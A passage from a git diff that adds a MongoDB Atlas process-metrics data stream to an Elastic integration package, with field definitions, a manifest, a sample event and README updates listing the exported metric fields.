kernel.pct + description: Percentage of time that the CPU spent servicing the operating system calls for the search process. + type: double + metric_type: gauge + unit: percent + - name: user.pct + description: Percentage of time that the CPU spent servicing user calls for the search process. + type: double + metric_type: gauge + unit: percent + - name: user.pct + description: The amount of CPU time spent by the Full-Text search process in user space. + type: double + metric_type: gauge + unit: percent + - name: disk + type: group + fields: + - name: utilization.total.bytes + description: Total bytes of disk space that search processes use. + type: long + metric_type: gauge + unit: byte + - name: memory + type: group + fields: + - name: mapped.total.bytes + description: Total bytes of mapped memory that search processes occupy. + type: long + metric_type: gauge + unit: byte + - name: resident.total.bytes + description: Total bytes of resident memory that search processes occupy. + type: long + metric_type: gauge + unit: byte + - name: virtual.total.bytes + description: Total bytes of virtual memory that search processes occupy. + type: long + metric_type: gauge + unit: byte + - name: global + type: group + fields: + - name: access.not_in_memory + description: The number of accesses to data that are not currently stored in memory, requiring disk access. + type: long + metric_type: gauge + - name: lock + type: group + fields: + - name: current_queue + type: group + fields: + - name: reader.count + description: The number of operations that are currently queued and waiting for the read lock. + type: long + metric_type: gauge + - name: total + description: The total number of operations queued waiting for the lock (readers + writers) + type: long + metric_type: gauge + - name: writer.count + description: The number of operations that are currently queued and waiting for the write lock. + type: long + metric_type: gauge + - name: page_fault.exception_thrown + description: The number of exceptions thrown due to page faults. + type: long + metric_type: gauge + - name: host + type: group + fields: + - name: page_faults + description: Measurements on page faults related to the host. + type: double + metric_type: gauge + - name: index + type: group + fields: + - name: btree + type: group + fields: + - name: access.count + description: Number of index btree ACCESSES. + type: long + metric_type: gauge + - name: hits.count + description: Number of index btree HITS. + type: long + metric_type: gauge + - name: miss_ratio.count + description: Index btree miss ratio. + type: double + metric_type: gauge + - name: miss.count + description: Number of index btree MISSES. + type: long + metric_type: gauge + - name: journaling + type: group + fields: + - name: commits.write_lock + description: Number of journaling COMMIT operations. + type: long + metric_type: gauge + - name: mb + description: Average amount of data in megabytes Cloud Manager writes to the recovery log per second meets your specified threshold. + type: double + metric_type: gauge + - name: write.data_files.mb + description: The maximum size in megabytes (MB) of data files written by the journaling process. + type: double + metric_type: gauge + - name: memory + type: group + fields: + - name: computed.mb + description: Amount of COMPUTED process memory in megabytes. + type: double + metric_type: gauge + - name: mapped.mb + description: Amount of MAPPED process memory in megabytes. + type: double + metric_type: gauge + - name: resident.mb + description: Amount of RESIDENT process memory in megabytes. + type: double + metric_type: gauge + - name: virtual.mb + description: Amount of VIRTUAL process memory in megabytes. + type: double + metric_type: gauge + - name: network + type: group + fields: + - name: in + description: Process incoming network throughput in bytes per second. + type: double + metric_type: gauge + - name: out + description: Process outgoing network throughput in bytes per second. + type: double + metric_type: gauge + - name: request.total + description: The total number of distinct requests that the process has received. + type: double + metric_type: counter + - name: opcounter + type: group + fields: + - name: cmd + description: Database operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: delete + description: Database DELETE operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: getmore + description: Database GETMORE operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: insert + description: Database INSERT operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: query + description: Database QUERY operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: repl + type: group + fields: + - name: cmd + description: Database operations rate on secondaries. + type: double + metric_type: gauge + - name: delete + description: Database DELETE operations rate on secondaries. + type: double + metric_type: gauge + - name: insert + description: Database INSERT operations rate on secondaries. + type: double + metric_type: gauge + - name: update + description: Database UPDATE operations rate on secondaries. + type: double + metric_type: gauge + - name: update + description: Database UPDATE operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: operation + type: group + fields: + - name: execution.time + type: group + fields: + - name: cmd.avg.ms + description: Average execution time in milliseconds per command operation over the selected sample period. + type: double + metric_type: gauge + unit: ms + - name: read.avg.ms + description: Average execution time in milliseconds per read operation over the selected sample period. + type: double + metric_type: gauge + unit: ms + - name: write.avg.ms + description: Average execution time in milliseconds per write operation over the selected sample period. + type: double + metric_type: gauge + unit: ms + - name: scan_and_order + description: The total number of queries that return sorted data that cannot perform the sort operation using an index. + type: double + metric_type: gauge + - name: oplog + type: group + fields: + - name: master + type: group + fields: + - name: lag.time_diff.s + description: Lag or delay in replication between the primary node (oplog master) and its secondary nodes. + type: double + unit: s + metric_type: gauge + - name: time.s + description: The replication oplog window. The approximate time available in the primary's replication oplog. If a secondary is behind real-time by more than this amount, it cannot catch up and will require a full resync. + type: double + metric_type: gauge + unit: s + - name: rate.gb_per_hour + description: The rate of change in the size of the oplog in gigabytes per hour. + type: double + metric_type: gauge + - name: repl_lag.s + description: The amount of time, typically in seconds, it takes for changes recorded in the oplog on the primary node to be replicated and applied to the secondary node. + type: double + metric_type: gauge + unit: s + - name: slave.lag.master.time.s + description: The difference in time, typically in seconds, between the oplog time on the secondary (slave) node and the time of the latest operation in the oplog on the primary (master) node. + type: double + metric_type: gauge + unit: s + - name: query + type: group + fields: + - name: executor + type: group + fields: + - name: scanned + description: Average rate per second to scan index items during queries and query-plan evaluations. + type: double + metric_type: gauge + - name: scanned_objects + description: Average rate of documents scanned per second during queries and query-plan evaluations. + type: double + metric_type: gauge + - name: targeting + type: group + fields: + - name: scanned_objects_per_returned + description: Ratio of the number of documents scanned to the number of documents returned. + type: double + metric_type: gauge + - name: scanned_per_returned + description: Ratio of the number of index items scanned to the number of documents returned. + type: double + metric_type: gauge + - name: restart.in_last_hour + description: Number of times the host restarted within the previous hour. + type: double + metric_type: gauge + - name: swap + type: group + fields: + - name: usage + type: group + fields: + - name: free.max.kb + description: Max amount of swap space free. + type: double + metric_type: counter + - name: total + type: group + fields: + - name: free + description: Total amount of swap space free. + type: double + metric_type: gauge + - name: used + description: Total amount of swap space in use. + type: double + metric_type: gauge + - name: used.max.kb + description: Max amount of swap space in use. + type: double + metric_type: counter + - name: system + type: group + fields: + - name: cpu + type: group + fields: + - name: guest + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent running a virtual CPU for guest operating systems. + type: double + metric_type: counter + unit: percent + - name: pct + description: Tracks CPU time consumed by guest operating systems, like virtual machines, on the host system. + type: double + metric_type: gauge + unit: percent + - name: iowait + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent waiting for I/O operations to complete. + type: double + metric_type: counter + unit: percent + - name: pct + description: The CPU time spent waiting for I/O operations to complete. + type: double + metric_type: gauge + unit: percent + - name: irq + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent servicing hardware interrupts. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent servicing hardware interrupts. + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent in kernel space, executing system calls and handling hardware interrupts. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent executing kernel space processes and handling system calls. + type: double + metric_type: gauge + unit: percent + - name: nice.pct + description: The portion of CPU time allocated to processes with a 'nice' priority level. + type: double + metric_type: gauge + unit: percent + - name: softirq + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent servicing soft interrupts, which are interrupts triggered by software. + type: double + metric_type: counter + unit: percent + - name: pct + description: The CPU time spent handling software-generated interrupts. + type: double + metric_type: gauge + unit: percent + - name: steal + type: group + fields: + - name: max.pct + description: Max amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. + type: double + metric_type: counter + unit: percent + - name: pct + description: The amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent in user space, executing user-level processes and applications. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent executing user space processes and running applications. + type: double + metric_type: gauge + unit: percent + - name: memory + type: group + fields: + - name: available + type: group + fields: + - name: kb + description: Physical memory available in kilobytes. + type: double + metric_type: gauge + - name: max.kb + description: Max Physical memory available in kilobytes. + type: double + metric_type: counter + - name: free + type: group + fields: + - name: kb + description: Physical memory free in kilobytes. + type: double + metric_type: gauge + - name: max.kb + description: Max Physical memory free in kilobytes. + type: double + metric_type: counter + - name: used + type: group + fields: + - name: kb + description: Physical memory used in kilobytes. + type: double + metric_type: gauge + - name: max.kb + description: Max Physical memory used in kilobytes. + type: double + metric_type: counter + - name: network + type: group + fields: + - name: in + description: Incoming network throughput in bytes per second. + type: double + metric_type: gauge + - name: max.in + description: Max Incoming network throughput in bytes per second. + type: double + metric_type: counter + - name: out + description: Outgoing network throughput in bytes per second. + type: double + metric_type: gauge + - name: max.out + description: Max Outgoing network throughput in bytes per second. + type: double + metric_type: counter + - name: normalized + type: group + fields: + - name: cpu + type: group + fields: + - name: guest + type: group + fields: + - name: max.pct + description: Max Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: iowait + type: group + fields: + - name: max.pct + description: Max CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: irq + type: group + fields: + - name: max.pct + description: Max CPU usage of hardware interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED irq CPU utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: Max kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: Kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: nice + type: group + fields: + - name: max.pct + description: Max CPU usage of processes with a positive nice value, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED nice CPU utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: softirq + type: group + fields: + - name: max.pct + description: Max CPU usage of software interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED softirq CPU utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: steal + type: group + fields: + - name: max.pct + description: Max The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU user space utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent executing user space processes and running applications. + type: double + metric_type: gauge + unit: percent + - name: ticket + type: group + fields: + - name: available + type: group + fields: + - name: read.count + description: The number of read tickets available to the WiredTiger storage engine. + type: long + metric_type: gauge + - name: write.count + description: The number of write tickets available to the WiredTiger storage engine. + type: long + metric_type: gauge + - name: process_id + description: Combination of hostname and Internet Assigned Numbers Authority (IANA) port that serves the MongoDB process. + type: keyword diff --git a/packages/mongodb_atlas/data_stream/process/manifest.yml b/packages/mongodb_atlas/data_stream/process/manifest.yml new file mode 100644 index 00000000000..65e84f48af9 --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/manifest.yml @@ -0,0 +1,54 @@ +title: Collect Process metrics from MongoDB Atlas +type: logs +streams: + - input: cel + title: MongoDB Atlas Process metrics + description: Collect Process metrics from MongoDB Atlas. + template_path: input.yml.hbs + vars: + - name: period + type: text + title: Period + description: Period of fetching metrics. Value of Granularity and Period will be same (check readme for more details). Supported units for this parameter are h/m. + default: 10m + multi: false + required: true + show_user: false + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are m/s. If the data collection period is extensive, ensure that this parameter's value is appropriately long. + multi: false + required: true + show_user: true + default: 1m + - name: groupId + type: text + title: GroupId + description: Identifier string that identifies your project. Groups and projects are synonymous terms. Group id is identical to project id. Ex. 32b6e34b3d91647abb20e7b8 + multi: false + required: true + show_user: true + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - mongodb_atlas-process + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. diff --git a/packages/mongodb_atlas/data_stream/process/sample_event.json b/packages/mongodb_atlas/data_stream/process/sample_event.json new file mode 100644 index 00000000000..563e7ab724c --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/sample_event.json @@ -0,0 +1,74 @@ +{ + "@timestamp": "2024-04-11T12:42:53.267Z", + "agent": { + "ephemeral_id": "c8ebb866-6d72-471b-9083-6d386219bf61", + "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.13.0" + }, + "data_stream": { + "dataset": "mongodb_atlas.process", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb", + "snapshot": false, + "version": "8.13.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "process" + ], + "dataset": "mongodb_atlas.process", + "ingested": "2024-04-11T12:43:05Z", + "kind": "event", + "module": "mongodb_atlas", + "type": [ + "info" + ] + }, + "host": { + "architecture": "x86_64", + "containerized": true, + "hostname": "docker-fleet-agent", + "id": "8259e024976a406e8a54cdbffeb84fec", + "ip": [ + "192.168.253.4" + ], + "mac": [ + "02-42-C0-A8-FD-04" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "3.10.0-1160.92.1.el7.x86_64", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "cel" + }, + "mongodb_atlas": { + "group_id": "mongodb-group1", + "host_id": "hostname1", + "process": { + "assert": { + "regular": 0 + } + }, + "process_id": "hostname1" + }, + "tags": [ + "mongodb_atlas-process" + ] +} \ No newline at end of file diff --git a/packages/mongodb_atlas/docs/README.md b/packages/mongodb_atlas/docs/README.md index 883bbce34a2..cc17df46cd8 100644 --- a/packages/mongodb_atlas/docs/README.md +++ b/packages/mongodb_atlas/docs/README.md @@ -6,19 +6,23 @@ Use the MongoDB Atlas integration to: -- Collect MongoDB Audit logs for comprehensive monitoring and analysis. +- Collect MongoDB Audit logs and Process metrics for comprehensive monitoring and analysis. - Create informative visualizations to track usage trends, measure key metrics, and derive actionable business insights. - Set up alerts to minimize Mean Time to Detect (MTTD) and Mean Time to Resolve (MTTR) by quickly referencing relevant logs during troubleshooting. ## Data streams -The MongoDB Atlas integration collects logs. +The MongoDB Atlas integration collects logs and metrics. Logs help you keep a record of events that happen on your machine. The `Log` data stream collected by MongoDB Atlas integration is `mongod_audit`. +Metrics give you insight into the statistics of the MongoDB Atlas. The `Metric` data stream collected by the MongoDB Atlas integration is `process` so that the user can monitor and troubleshoot the performance of the MongoDB Atlas instance. + Data streams: - `mongod_audit`: The auditing facility allows administrators and users to track system activity for deployments with multiple users and applications. Mongod Audit logs capture events related to database operations such as insertions, updates, deletions, user authentication, etc., occurring within the mongod instances. +- `process` : This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + Note: - Users can monitor and see the log inside the ingested documents for MongoDB Atlas in the `logs-*` index pattern from `Discover`. @@ -28,18 +32,25 @@ You can store and search your data using Elasticsearch and visualize and manage ## Setup -### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required: +### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required 1. Public Key 2. Private Key 3. GroupId -### Steps to obtain Public Key, Private Key and GroupId: +### Steps to obtain Public Key, Private Key and GroupId 1. Generate programmatic API Keys with project owner permissions using the instructions in the Atlas [documentation](https://www.mongodb.com/docs/atlas/configure-api-access/#create-an-api-key-for-a-project). Then, copy the public key and private key. These serve the same function as a username and API Key respectively. 2. Enable Database Auditing for the Atlas project you want to monitor logs. You can follow the instructions provided in this Atlas [document](https://www.mongodb.com/docs/atlas/database-auditing/#procedure). 3. You can find your Project ID (Group ID) in the Atlas UI. To do this, navigate to your project, click on Settings, and copy the Project ID (Group ID). You can also programmatically find it using the Atlas Admin API or Atlas CLI as described in this Atlas [document](https://www.mongodb.com/docs/atlas/app-services/apps/metadata/#find-a-project-id). +### Important terms of MongoDB Atlas API + +1. Granularity: Duration that specifies the interval at which Atlas reports the metrics. +2. Period: Duration over which Atlas reports the metrics. + +Note: Both of above attributes can be set by using `period` in configuration parameters. + ### Steps to enable Integration in Elastic 1. In Kibana go to Management > Integrations @@ -205,3 +216,237 @@ An example event for `mongod_audit` looks as following: | mongodb_atlas.mongod_audit.uuid.binary | Document that contains a universally unique identifier (UUID) for the audit message. | keyword | | mongodb_atlas.mongod_audit.uuid.type | The $type field specifies the BSON subtype for the $binary field. | keyword | | tags | List of keywords used to tag each event. | keyword | + + +## Metrics reference + +### Process +This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + +An example event for `process` looks as following: + +```json +{ + "@timestamp": "2024-04-11T12:42:53.267Z", + "agent": { + "ephemeral_id": "c8ebb866-6d72-471b-9083-6d386219bf61", + "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.13.0" + }, + "data_stream": { + "dataset": "mongodb_atlas.process", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb", + "snapshot": false, + "version": "8.13.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "process" + ], + "dataset": "mongodb_atlas.process", + "ingested": "2024-04-11T12:43:05Z", + "kind": "event", + "module": "mongodb_atlas", + "type": [ + "info" + ] + }, + "host": { + "architecture": "x86_64", + "containerized": true, + "hostname": "docker-fleet-agent", + "id": "8259e024976a406e8a54cdbffeb84fec", + "ip": [ + "192.168.253.4" + ], + "mac": [ + "02-42-C0-A8-FD-04" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "3.10.0-1160.92.1.el7.x86_64", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "cel" + }, + "mongodb_atlas": { + "group_id": "mongodb-group1", + "host_id": "hostname1", + "process": { + "assert": { + "regular": 0 + } + }, + "process_id": "hostname1" + }, + "tags": [ + "mongodb_atlas-process" + ] +} +``` + +**Exported fields** + +| Field | Description | Type | Unit | Metric Type | +|---|---|---|---|---| +| @timestamp | Event timestamp. | date | | | +| data_stream.dataset | Data stream dataset. | constant_keyword | | | +| data_stream.namespace | Data stream namespace. | constant_keyword | | | +| data_stream.type | Data stream type. | constant_keyword | | | +| input.type | Type of Filebeat input. | keyword | | | +| mongodb_atlas.group_id | Identifier for the project of the event. | keyword | | | +| mongodb_atlas.host_id | Unique identifier of the host for the MongoDB process. | keyword | | | +| mongodb_atlas.process.assert.msg | The average rate of message asserts per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.assert.regular | The average rate of regular asserts raised per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.assert.user | The average rate of user asserts per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.assert.warning | The average rate of warnings per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.background_flush.avg | Amount of data flushed in the background. | double | | gauge | +| mongodb_atlas.process.cache.dirty.bytes | Write - Amount of bytes in the WiredTiger storage engine cache. | double | byte | gauge | +| mongodb_atlas.process.cache.read.bytes | Read - Amount of bytes in the WiredTiger storage engine cache. | double | byte | gauge | +| mongodb_atlas.process.cache.used.total.bytes | The total bytes cached in memory for serving reads and writes. | double | byte | gauge | +| mongodb_atlas.process.cache.write.bytes | The maximum disk read latency value over the period specified by the metric granularity. | double | byte | gauge | +| mongodb_atlas.process.connections | Displays the total number of active connections to the database deployment. Monitor connections to determine whether the current connection limits are sufficient. | double | | gauge | +| mongodb_atlas.process.cpu.children.kernel.max.pct | The maximum amount of CPU time spent by child processes in kernel space. | double | percent | counter | +| mongodb_atlas.process.cpu.children.kernel.pct | CPU children kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.children.user.max.pct | The maximum amount of CPU time spent by child processes in user space. | double | percent | counter | +| mongodb_atlas.process.cpu.children.user.pct | CPU children user space for mongodb. | double | percent | gauge | +| mongodb_atlas.process.cpu.kernel.max.pct | The maximum amount of CPU time spent by the MongoDB process itself in kernel space, handling system calls and hardware interrupts. | double | percent | counter | +| mongodb_atlas.process.cpu.kernel.pct | CPU kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.normalized.children.kernel.max.pct | Max children kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.cpu.normalized.children.kernel.pct | NORMALIZED CPU children kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.normalized.children.user.max.pct | Max children user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.cpu.normalized.children.user.pct | NORMALIZED CPU children user space for mongodb. | double | percent | gauge | +| mongodb_atlas.process.cpu.normalized.kernel.max.pct | Max kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.cpu.normalized.kernel.pct | NORMALIZED CPU kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.normalized.user.max.pct | Max user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.cpu.normalized.user.pct | NORMALIZED CPU user space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.user.max.pct | The maximum amount of CPU time spent by the MongoDB process itself in user space, executing application code and processing data. | double | percent | counter | +| mongodb_atlas.process.cpu.user.pct | CPU user space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cursor.open.total | The number of cursors that the server maintains for clients. | long | | gauge | +| mongodb_atlas.process.cursor.timed_out.total | The average rate of cursors that have timed out per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.database.size.total.bytes | The amount of storage space in bytes that your stored data uses. | long | byte | gauge | +| mongodb_atlas.process.database.storage.total.bytes | Sum total of the compressed on-disk storage space allocated for document storage across all databases. | long | byte | gauge | +| mongodb_atlas.process.document.deleted | Displays the documents deleted per second. | double | | gauge | +| mongodb_atlas.process.document.inserted | Displays the documents inserted per second. | double | | gauge | +| mongodb_atlas.process.document.returned | Displays the documents returned per second. | double | | gauge | +| mongodb_atlas.process.document.updated | Displays the documents updated per second. | double | | gauge | +| mongodb_atlas.process.fts.cpu.kernel.pct | The amount of CPU time spent by the Full-Text search process in kernel space. | double | percent | gauge | +| mongodb_atlas.process.fts.cpu.normalized.kernel.pct | Percentage of time that the CPU spent servicing the operating system calls for the search process. | double | percent | gauge | +| mongodb_atlas.process.fts.cpu.normalized.user.pct | Percentage of time that the CPU spent servicing user calls for the search process. | double | percent | gauge | +| mongodb_atlas.process.fts.cpu.user.pct | The amount of CPU time spent by the Full-Text search process in user space. | double | percent | gauge | +| mongodb_atlas.process.fts.disk.utilization.total.bytes | Total bytes of disk space that search processes use. | long | byte | gauge | +| mongodb_atlas.process.fts.memory.mapped.total.bytes | Total bytes of mapped memory that search processes occupy. | long | byte | gauge | +| mongodb_atlas.process.fts.memory.resident.total.bytes | Total bytes of resident memory that search processes occupy. | long | byte | gauge | +| mongodb_atlas.process.fts.memory.virtual.total.bytes | Total bytes of virtual memory that search processes occupy. | long | byte | gauge | +| mongodb_atlas.process.global.access.not_in_memory | The number of accesses to data that are not currently stored in memory, requiring disk access. | long | | gauge | +| mongodb_atlas.process.global.lock.current_queue.reader.count | The number of operations that are currently queued and waiting for the read lock. | long | | gauge | +| mongodb_atlas.process.global.lock.current_queue.total | The total number of operations queued waiting for the lock (readers + writers) | long | | gauge | +| mongodb_atlas.process.global.lock.current_queue.writer.count | The number of operations that are currently queued and waiting for the write lock. | long | | gauge | +| mongodb_atlas.process.global.page_fault.exception_thrown | The number of exceptions thrown due to page faults. | long | | gauge | +| mongodb_atlas.process.host.page_faults | Measurements on page faults related to the host. | double | | gauge | +| mongodb_atlas.process.index.btree.access.count | Number of index btree ACCESSES. | long | | gauge | +| mongodb_atlas.process.index.btree.hits.count | Number of index btree HITS. | long | | gauge | +| mongodb_atlas.process.index.btree.miss.count | Number of index btree MISSES. | long | | gauge | +| mongodb_atlas.process.index.btree.miss_ratio.count | Index btree miss ratio. | double | | gauge | +| mongodb_atlas.process.journaling.commits.write_lock | Number of journaling COMMIT operations. | long | | gauge | +| mongodb_atlas.process.journaling.mb | Average amount of data in megabytes Cloud Manager writes to the recovery log per second meets your specified threshold. | double | | gauge | +| mongodb_atlas.process.journaling.write.data_files.mb | The maximum size in megabytes (MB) of data files written by the journaling process. | double | | gauge | +| mongodb_atlas.process.memory.computed.mb | Amount of COMPUTED process memory in megabytes. | double | | gauge | +| mongodb_atlas.process.memory.mapped.mb | Amount of MAPPED process memory in megabytes. | double | | gauge | +| mongodb_atlas.process.memory.resident.mb | Amount of RESIDENT process memory in megabytes. | double | | gauge | +| mongodb_atlas.process.memory.virtual.mb | Amount of VIRTUAL process memory in megabytes. | double | | gauge | +| mongodb_atlas.process.network.in | Process incoming network throughput in bytes per second. | double | | gauge | +| mongodb_atlas.process.network.out | Process outgoing network throughput in bytes per second. | double | | gauge | +| mongodb_atlas.process.network.request.total | The total number of distinct requests that the process has received. | double | | counter | +| mongodb_atlas.process.opcounter.cmd | Database operations rate on a process since the process last started. | double | | gauge | +| mongodb_atlas.process.opcounter.delete | Database DELETE operations rate on a process since the process last started. | double | | gauge | +| mongodb_atlas.process.opcounter.getmore | Database GETMORE operations rate on a process since the process last started. | double | | gauge | +| mongodb_atlas.process.opcounter.insert | Database INSERT operations rate on a process since the process last started. | double | | gauge | +| mongodb_atlas.process.opcounter.query | Database QUERY operations rate on a process since the process last started. | double | | gauge | +| mongodb_atlas.process.opcounter.repl.cmd | Database operations rate on secondaries. | double | | gauge | +| mongodb_atlas.process.opcounter.repl.delete | Database DELETE operations rate on secondaries. | double | | gauge | +| mongodb_atlas.process.opcounter.repl.insert | Database INSERT operations rate on secondaries. | double | | gauge | +| mongodb_atlas.process.opcounter.repl.update | Database UPDATE operations rate on secondaries. | double | | gauge | +| mongodb_atlas.process.opcounter.update | Database UPDATE operations rate on a process since the process last started. | double | | gauge | +| mongodb_atlas.process.operation.execution.time.cmd.avg.ms | Average execution time in milliseconds per command operation over the selected sample period. | double | ms | gauge | +| mongodb_atlas.process.operation.execution.time.read.avg.ms | Average execution time in milliseconds per read operation over the selected sample period. | double | ms | gauge | +| mongodb_atlas.process.operation.execution.time.write.avg.ms | Average execution time in milliseconds per write operation over the selected sample period. | double | ms | gauge | +| mongodb_atlas.process.operation.scan_and_order | The total number of queries that return sorted data that cannot perform the sort operation using an index. | double | | gauge | +| mongodb_atlas.process.oplog.master.lag.time_diff.s | Lag or delay in replication between the primary node (oplog master) and its secondary nodes. | double | s | gauge | +| mongodb_atlas.process.oplog.master.time.s | The replication oplog window. The approximate time available in the primary's replication oplog. If a secondary is behind real-time by more than this amount, it cannot catch up and will require a full resync. | double | s | gauge | +| mongodb_atlas.process.oplog.rate.gb_per_hour | The rate of change in the size of the oplog in gigabytes per hour. | double | | gauge | +| mongodb_atlas.process.oplog.repl_lag.s | The amount of time, typically in seconds, it takes for changes recorded in the oplog on the primary node to be replicated and applied to the secondary node. | double | s | gauge | +| mongodb_atlas.process.oplog.slave.lag.master.time.s | The difference in time, typically in seconds, between the oplog time on the secondary (slave) node and the time of the latest operation in the oplog on the primary (master) node. | double | s | gauge | +| mongodb_atlas.process.query.executor.scanned | Average rate per second to scan index items during queries and query-plan evaluations. | double | | gauge | +| mongodb_atlas.process.query.executor.scanned_objects | Average rate of documents scanned per second during queries and query-plan evaluations. | double | | gauge | +| mongodb_atlas.process.query.targeting.scanned_objects_per_returned | Ratio of the number of documents scanned to the number of documents returned. | double | | gauge | +| 